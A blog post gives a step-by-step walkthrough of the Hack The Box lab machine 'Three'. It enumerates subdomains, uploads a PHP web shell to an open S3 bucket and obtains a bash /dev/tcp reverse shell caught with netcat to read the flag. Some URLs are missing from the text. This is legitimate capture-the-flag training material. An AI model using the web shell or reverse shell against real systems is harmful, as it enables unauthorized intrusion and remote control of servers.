The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Three: Get a reverse shell via AWS S3

posted on 21.5.2023 by Below Surface in "Hack The Box"

First things first: Port scan, please exchange ip with the machines IP address.

sudo nmap -sV ip

Relevant output:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

By pasting the IP address into a browser, a website will load. However if we try to open the website via the url "thetoppers.htb", which can be found on the CONTACT page (mail@thetoppers.htb), it would not work. So we modifiy our local hosts file:

sudo nano /etc/hosts

After the 127... entries, add your machines IP address and the url "thetoppers.htb", so it looks like this:       localhost       kali
ip              thetoppers.htb

Then hit ctrl + o and then enter to save the changes and ctrl + x to close the editor.

Now, when we paste the url "thetoppers.htb" into the browser, it still won't work. We need to add "http://" before. The now working url is


Let's now search for available subdomains with Gobuster.

If you don't have the following wordlist installed yet, run

sudo apt install seclists

Then you can search for subdomains:

sudo gobuster vhost -u http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

The "--append-domain" is crucial, if you use Gobuster v3.2 and above! The relevant result is:

Found: s3.thetoppers.htb Status: 404 [Size: 21]

Let's also add this to the hosts file, like we did before. The hosts file looks something like this now:       localhost       kali
ip              thetoppers.htb
ip              s3.thetoppers.htb

We can confirm that everything works so far, by pasting "http://s3.thetoppers.htb" into the browser. The result should be:

{"status": "running"}

Now it's time to install the AWS CLI and connect to the s3 bucket.

sudo apt install awscli

Then, we need to configure aws

aws configure

And type in any string. It does not matter what, because those keys are not actually checked. I used "temp".

Let's list any s3 bucket available:

aws --endpoint=http://s3.thetoppers.htb s3 ls

Expected output:

2023-05-21 02:40:47 thetoppers.htb

Let's list the content of the s3 bucket:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Expected output:

                           PRE images/
2023-05-21 02:40:47          0 .htaccess
2023-05-21 02:40:47      11952 index.php

Let's create a local shell.php file with the following content:

<?php system($_GET["cmd"]); ?>

Now we will upload this script to the s3 bucket.

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

Expected output:

upload: ./shell.php to s3://thetoppers.htb/shell.php

To confirm it's uploaded, run this command again:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

The shell.php file should be listed there. We can also go to our browser and paste this url:


Expected output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Finally we can get the reverse shell. Let's request the inet ip of tun0:

ifconfig tun0

The relevant output is (ip being the IP address you need):

inet ip

Create a local file and paste the content, exchanging ip with your ifconfig tun0 inet ip value:

sh -i >& /dev/tcp/ip/443 0>&

And start listening on port 443 (more stealthy than port 1337) with ncat:

sudo nc -lvnp 443

Expected output:

listening on [any] 443 ...

In a new terminal window, start a webserver to host our reverse shell script

python3 -m http.server 8080

Expected output:

Serving HTTP on port 8080 ( ...

Now, paste this url into your browser (exchange ip with the IP address you got from "ifconfig tun0".


In the ncat terminal window, a new output should appear, including something like this:

onnect to [] from (UNKNOWN) [] 39378
sh: 0: can't access tty; job control turned off

by running


The terminal output should be

uid=33(www-data) gid=33(www-data) groups=33(www-data)

So, it works! Let's get the flag. Type in

cd ..

To navigate to the directory /var/www. Then run

cat flag.txt

To output the flag!


hack the box
aws cli
s3 bucket
reverse shell


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box